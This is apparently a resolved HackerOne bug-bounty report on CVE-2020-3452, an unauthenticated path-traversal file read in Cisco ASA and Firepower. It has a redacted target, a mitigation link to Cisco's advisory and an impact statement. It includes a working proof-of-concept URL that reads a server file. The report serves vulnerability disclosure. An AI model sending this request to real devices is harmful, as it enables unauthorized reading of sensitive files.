CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
High
Vulnerability Details
**Summary:**
#_The affected IP_:
█████
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
for example:
████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Suggested Mitigation/Remediation Actions
Cisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
## Impact
This vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.
Actions
View on HackerOneReport Stats
- Report ID: 951508
- State: Closed
- Substate: resolved
- Upvotes: 7